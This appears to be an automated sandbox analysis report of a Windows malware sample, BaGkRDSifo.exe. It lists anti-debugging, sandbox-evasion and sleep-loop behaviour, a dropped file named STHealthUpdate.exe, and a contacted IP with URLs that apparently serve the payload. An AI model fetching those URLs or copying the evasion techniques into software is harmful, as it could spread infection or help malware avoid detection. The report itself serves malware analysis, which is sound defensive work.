Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Memory allocated: 24E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Memory allocated: 31B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Memory allocated: 2EF0000 memory reserve | memory write watch Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599889 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599446 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599186 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598968 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598857 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598750 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598641 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598422 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598094 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597327 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597200 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597078 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596949 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596563 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596188 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596078 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594493 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594364 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594016 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 593891 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Window / User API: threadDelayed 3275 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Window / User API: threadDelayed 6527 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Dropped PE file which has not been started: C:\Users\user\Desktop\STHealthUpdate.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 4516 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -599889s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -599446s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -599186s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598968s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598857s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -598094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597327s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597200s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -597078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596949s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -596078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -595063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594493s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594364s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -594016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820 Thread sleep time: -593891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 4516 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599889 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599446 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599186 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598968 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598857 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598750 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598641 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598422 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 598094 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597327 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597200 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 597078 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596949 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596563 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596188 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 596078 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594493 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594364 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 594016 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 593891 Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: BaGkRDSifo.exe, 00000000.00000002.2490141797.0000000005830000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: C:\Users\user\Desktop\BaGkRDSifo.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040CE09
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree, 0_2_0040ADB0
Enables debug privileges
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040CE09
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040E61C
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00416F6A
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004123F1 SetUnhandledExceptionFilter, 0_2_004123F1
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Memory allocated: page read and write | page guard Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: GetLocaleInfoA, 0_2_00417A20
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00412A15
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1448043 Sample: BaGkRDSifo.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 80 13 Malicious sample detected (through community Yara rule) 2->13 15 Multi AV Scanner detection for submitted file 2->15 17 .NET source code contains method to dynamically call methods (often used by packers) 2->17 19 5 other signatures 2->19 5 BaGkRDSifo.exe 15 5 2->5         started        process3 dnsIp4 11 47.104.173.216, 49701, 9876 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 5->11 9 C:\Users\user\Desktop\STHealthUpdate.exe, PE32 5->9 dropped file5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
47.104.173.216
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://47.104.173.216:9876/server.txt false
  • Avira URL Cloud: safe
 unknown
http://47.104.173.216:9876/STHealthUpdate.exe false
  • Avira URL Cloud: safe
 unknown